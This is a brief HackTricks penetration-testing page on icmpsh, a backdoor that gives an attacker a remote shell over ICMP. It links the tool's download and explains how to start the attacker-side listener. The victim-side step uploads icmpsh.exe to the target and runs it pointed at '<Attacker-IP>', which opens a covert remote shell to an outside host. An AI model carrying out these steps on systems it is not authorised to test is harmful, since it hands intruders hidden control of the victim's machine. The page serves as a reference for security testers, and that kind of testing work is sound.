hacktricks/backdoors/icmpsh.md
carlospolop f0e09e3f54 social
2023-03-06 00:16:20 +01:00

3.5 KiB

HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥

Download the backdoor from: https://github.com/inquisb/icmpsh

Client side

Execute the script: run.sh

If you get some error, try to change the lines:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

For:

echo Please insert the IP where you want to listen
read IP

Victim Side

Upload icmpsh.exe to the victim and execute:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥